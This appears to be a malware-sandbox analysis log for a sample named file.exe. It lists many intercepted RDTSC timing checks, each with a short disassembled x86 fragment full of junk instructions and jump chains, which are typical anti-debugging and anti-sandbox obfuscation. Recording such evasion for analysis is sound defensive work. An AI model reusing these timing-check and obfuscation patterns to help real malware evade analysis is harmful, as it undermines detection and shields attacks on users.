Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260EF7 second address: 7260F42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 409C21B4h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-14h] 0x0000000e pushad 0x0000000f movzx esi, di 0x00000012 push ebx 0x00000013 mov ebx, ecx 0x00000015 pop esi 0x00000016 popad 0x00000017 mov ecx, esi 0x00000019 pushad 0x0000001a push edx 0x0000001b mov cx, 7C67h 0x0000001f pop ecx 0x00000020 pushfd 0x00000021 jmp 00007F70F070E5CDh 0x00000026 jmp 00007F70F070E5CBh 0x0000002b popfd 0x0000002c popad 0x0000002d mov dword ptr [esi+0Ch], eax 0x00000030 pushad 0x00000031 pushad 0x00000032 mov edx, eax 0x00000034 mov ecx, 4850B39Dh 0x00000039 popad 0x0000003a push ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260F42 second address: 7260F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov edx, 759B06ECh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260F53 second address: 7260F6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260F6A second address: 7260F82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB14h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260F82 second address: 7260F94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260F94 second address: 7260F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260F9B second address: 7260FF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d pushad 0x0000000e call 00007F70F070E5CDh 0x00000013 call 00007F70F070E5D0h 0x00000018 pop eax 0x00000019 pop edx 0x0000001a popad 0x0000001b pop edi 0x0000001c jmp 00007F70F070E5CEh 0x00000021 test eax, eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F70F070E5CAh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260FF3 second address: 7260FF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260FF9 second address: 7261029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F715EDDCC97h 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 mov ebx, esi 0x00000015 popad 0x00000016 mov edx, dword ptr [ebp+08h] 0x00000019 pushad 0x0000001a push edx 0x0000001b push esi 0x0000001c pop ebx 0x0000001d pop eax 0x0000001e popad 0x0000001f mov eax, dword ptr [esi] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7261029 second address: 7261039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7261039 second address: 7261122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b jmp 00007F70F070E5D6h 0x00000010 mov eax, dword ptr [esi+04h] 0x00000013 jmp 00007F70F070E5D0h 0x00000018 mov dword ptr [edx+04h], eax 0x0000001b jmp 00007F70F070E5D0h 0x00000020 mov eax, dword ptr [esi+08h] 0x00000023 pushad 0x00000024 call 00007F70F070E5CEh 0x00000029 push eax 0x0000002a pop edi 0x0000002b pop eax 0x0000002c pushfd 0x0000002d jmp 00007F70F070E5D7h 0x00000032 sub ax, 311Eh 0x00000037 jmp 00007F70F070E5D9h 0x0000003c popfd 0x0000003d popad 0x0000003e mov dword ptr [edx+08h], eax 0x00000041 pushad 0x00000042 mov esi, 45722683h 0x00000047 mov si, A7DFh 0x0000004b popad 0x0000004c mov eax, dword ptr [esi+0Ch] 0x0000004f pushad 0x00000050 mov si, B3D7h 0x00000054 pushfd 0x00000055 jmp 00007F70F070E5CCh 0x0000005a add si, AE48h 0x0000005f jmp 00007F70F070E5CBh 0x00000064 popfd 0x00000065 popad 0x00000066 mov dword ptr [edx+0Ch], eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F70F070E5D5h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7261122 second address: 726117E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F70F0BCDB17h 0x00000009 xor ah, FFFFFFEEh 0x0000000c jmp 00007F70F0BCDB19h 0x00000011 popfd 0x00000012 mov dx, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [esi+10h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F70F0BCDB19h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726117E second address: 72611CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F70F070E5D3h 0x00000015 adc ch, 0000000Eh 0x00000018 jmp 00007F70F070E5D9h 0x0000001d popfd 0x0000001e push eax 0x0000001f pop edx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72611CD second address: 72611E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72611E7 second address: 72611FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72611FA second address: 7261221 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+14h], eax 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7261221 second address: 7261287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F70F070E5D5h 0x0000000a and cl, FFFFFFB6h 0x0000000d jmp 00007F70F070E5D1h 0x00000012 popfd 0x00000013 popad 0x00000014 popad 0x00000015 mov eax, dword ptr [esi+18h] 0x00000018 pushad 0x00000019 movzx esi, dx 0x0000001c mov edi, 18ABB7ECh 0x00000021 popad 0x00000022 mov dword ptr [edx+18h], eax 0x00000025 jmp 00007F70F070E5CBh 0x0000002a mov eax, dword ptr [esi+1Ch] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F70F070E5D5h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7261287 second address: 726128C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7261380 second address: 72613DE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F70F070E5D0h 0x00000008 add eax, 7B53F9D8h 0x0000000e jmp 00007F70F070E5CBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [edx+24h], eax 0x0000001a jmp 00007F70F070E5D6h 0x0000001f mov eax, dword ptr [esi+28h] 0x00000022 jmp 00007F70F070E5D0h 0x00000027 mov dword ptr [edx+28h], eax 0x0000002a pushad 0x0000002b mov di, si 0x0000002e push esi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72613DE second address: 72613EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov ecx, dword ptr [esi+2Ch] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72613EC second address: 7261414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 mov al, DEh 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [edx+2Ch], ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F70F070E5D8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7261414 second address: 7261484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d jmp 00007F70F0BCDB16h 0x00000012 mov word ptr [edx+30h], ax 0x00000016 pushad 0x00000017 call 00007F70F0BCDB0Eh 0x0000001c pushfd 0x0000001d jmp 00007F70F0BCDB12h 0x00000022 sub si, 94E8h 0x00000027 jmp 00007F70F0BCDB0Bh 0x0000002c popfd 0x0000002d pop esi 0x0000002e mov dx, C52Ch 0x00000032 popad 0x00000033 mov ax, word ptr [esi+32h] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7261484 second address: 7261488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7261488 second address: 72614A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72614A4 second address: 72614AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72614AA second address: 72614AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72614AE second address: 72614B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72614B2 second address: 7261507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c jmp 00007F70F0BCDB19h 0x00000011 mov eax, dword ptr [esi+34h] 0x00000014 pushad 0x00000015 call 00007F70F0BCDB0Ch 0x0000001a jmp 00007F70F0BCDB12h 0x0000001f pop ecx 0x00000020 movsx ebx, ax 0x00000023 popad 0x00000024 mov dword ptr [edx+34h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7261507 second address: 726150B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726150B second address: 726151A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726151A second address: 726155F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 pushfd 0x00000007 jmp 00007F70F070E5CBh 0x0000000c xor ecx, 147371AEh 0x00000012 jmp 00007F70F070E5D9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test ecx, 00000700h 0x00000021 pushad 0x00000022 mov esi, 57B6B6D3h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726155F second address: 7261563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7261563 second address: 726157F instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007F715EDDC773h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F70F070E5CDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726157F second address: 726158F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726158F second address: 7261606 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+38h], FFFFFFFFh 0x0000000f jmp 00007F70F070E5D6h 0x00000014 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000018 jmp 00007F70F070E5D0h 0x0000001d or dword ptr [edx+40h], FFFFFFFFh 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F70F070E5CEh 0x00000028 or cl, 00000048h 0x0000002b jmp 00007F70F070E5CBh 0x00000030 popfd 0x00000031 movzx ecx, di 0x00000034 popad 0x00000035 pop esi 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F70F070E5CEh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7261606 second address: 7261640 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 movsx edx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c jmp 00007F70F0BCDB14h 0x00000011 leave 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F70F0BCDB17h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72B0CBD second address: 72B0CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72B0CC1 second address: 72B0CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, edx 0x00000008 popad 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F70F0BCDB14h 0x00000015 sbb ecx, 5283C078h 0x0000001b jmp 00007F70F0BCDB0Bh 0x00000020 popfd 0x00000021 mov ebx, ecx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F005E second address: 71F0064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F0064 second address: 71F0068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F0068 second address: 71F006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F006C second address: 71F008A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F70F0BCDB11h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F008A second address: 71F0090 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F06CF second address: 71F06D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F06D6 second address: 71F0749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F70F070E5D4h 0x00000011 sbb eax, 71A62AD8h 0x00000017 jmp 00007F70F070E5CBh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F70F070E5D8h 0x00000023 or ch, 00000038h 0x00000026 jmp 00007F70F070E5CBh 0x0000002b popfd 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f pushad 0x00000030 mov ebx, ecx 0x00000032 movzx ecx, bx 0x00000035 popad 0x00000036 pop ebp 0x00000037 pushad 0x00000038 push edi 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F0AEF second address: 71F0B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F0B01 second address: 71F0B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov di, ax 0x0000000d mov cx, 3FC5h 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F70F070E5D7h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7240A8D second address: 7240A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7240A91 second address: 7240A97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7240A97 second address: 7240AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7220008 second address: 72200C1 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F70F070E5D4h 0x00000012 add si, BA18h 0x00000017 jmp 00007F70F070E5CBh 0x0000001c popfd 0x0000001d jmp 00007F70F070E5D8h 0x00000022 popad 0x00000023 mov dword ptr [esp], ebp 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F70F070E5CEh 0x0000002d xor cx, 9BA8h 0x00000032 jmp 00007F70F070E5CBh 0x00000037 popfd 0x00000038 popad 0x00000039 mov ebp, esp 0x0000003b jmp 00007F70F070E5D2h 0x00000040 and esp, FFFFFFF0h 0x00000043 jmp 00007F70F070E5D0h 0x00000048 sub esp, 44h 0x0000004b pushad 0x0000004c mov ebx, esi 0x0000004e popad 0x0000004f xchg eax, ebx 0x00000050 jmp 00007F70F070E5D4h 0x00000055 push eax 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 mov ecx, edi 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72200C1 second address: 722011E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx ecx, dx 0x0000000c popad 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 push edi 0x00000011 pop esi 0x00000012 mov bx, A10Eh 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007F70F0BCDB0Fh 0x0000001d jmp 00007F70F0BCDB13h 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 call 00007F70F0BCDB0Bh 0x0000002d pop ecx 0x0000002e push ebx 0x0000002f pop ecx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722011E second address: 722015E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F70F070E5CBh 0x0000000f xchg eax, esi 0x00000010 jmp 00007F70F070E5D6h 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722015E second address: 7220164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7220164 second address: 722016A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722016A second address: 722016E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722016E second address: 7220183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov eax, 03220245h 0x00000011 movzx eax, di 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7220183 second address: 72201CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F70F0BCDB0Ah 0x00000009 jmp 00007F70F0BCDB15h 0x0000000e popfd 0x0000000f jmp 00007F70F0BCDB10h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, edi 0x00000018 pushad 0x00000019 call 00007F70F0BCDB0Eh 0x0000001e pop ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72201CE second address: 722020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F70F070E5CAh 0x0000000a sbb si, 1698h 0x0000000f jmp 00007F70F070E5CBh 0x00000014 popfd 0x00000015 popad 0x00000016 popad 0x00000017 mov edi, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F70F070E5D5h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722020A second address: 722021A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722021A second address: 7220237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+24h], 00000000h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov eax, 2EDD291Fh 0x00000018 mov cx, 383Bh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7220237 second address: 7220241 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1D299D22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7220241 second address: 7220261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 lock bts dword ptr [edi], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F70F070E5D2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7220261 second address: 72202B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F70F0BCDB11h 0x00000009 adc ax, 51A6h 0x0000000e jmp 00007F70F0BCDB11h 0x00000013 popfd 0x00000014 mov ax, 38D7h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jc 00007F716086FCA5h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F70F0BCDB19h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72202B5 second address: 72202C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72202C5 second address: 72202EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F70F0BCDB18h 0x00000011 push eax 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72202EC second address: 722030F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ax, 2A81h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725078F second address: 72507A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx esi, bx 0x00000010 rdtsc
